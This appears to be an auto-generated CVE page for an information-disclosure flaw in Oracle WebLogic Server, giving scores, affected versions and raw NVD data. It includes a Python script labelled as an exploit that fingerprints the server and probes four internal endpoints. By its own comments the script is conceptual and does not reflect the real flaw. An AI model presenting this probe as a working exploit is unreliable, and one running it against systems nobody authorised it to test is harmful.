Security Vulnerability Report
CVE-2025-61764 CVSS 5.3 MEDIUM

Published: 2025-10-21 20:20:53
Last Modified: 2025-10-24 14:27:37

Description

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:weblogic_server:14.1.2.0.0:*:*:*:*:*:*:* - VULNERABLE
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
Oracle WebLogic Server 14.1.2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61764 - Oracle WebLogic Server Information Disclosure PoC
# Note: This is a conceptual PoC based on publicly available information.
# The actual exploitation details have not been fully disclosed.
import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target:7001"


def check_weblogic_version():
    """Check Oracle WebLogic Server version"""
    try:
        # Attempt to identify WebLogic Server via console page
        response = requests.get(f"{TARGET_URL}/console/login/LoginForm.jsp", timeout=10)
        if "WebLogic" in response.text or response.status_code == 200:
            print(f"[+] Oracle WebLogic Server detected at {TARGET_URL}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
    return False


def exploit_info_disclosure():
    """
    Attempt to exploit the information disclosure vulnerability in
    Oracle WebLogic Server Core component (CVE-2025-61764).
    Affected versions: 12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0
    """
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "*/*"
    }
    # Common endpoints that may be vulnerable to info disclosure
    endpoints = [
        "/console/framework/skins/wlsconsole/images/Logo.png",
        "/bea_wls_deployment_internal/DeploymentService",
        "/wls-wsat/CoordinatorPortType",
        "/_async/AsyncResponseService"
    ]
    for endpoint in endpoints:
        try:
            url = f"{TARGET_URL}{endpoint}"
            response = requests.get(url, headers=headers, timeout=10)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] Accessible endpoint: {url}")
                print(f"    Response length: {len(response.content)} bytes")
        except requests.exceptions.RequestException:
            pass


if __name__ == "__main__":
    if check_weblogic_version():
        exploit_info_disclosure()
    else:
        print("[-] Target does not appear to be running Oracle WebLogic Server")
```

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61764",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T20:20:53.027",
    "lastModified": "2025-10-24T14:27:36.910",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.2.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "0FCA3D99-4596-4CF0-B5E1-7A6497F83B83"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpuoct2025.html",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```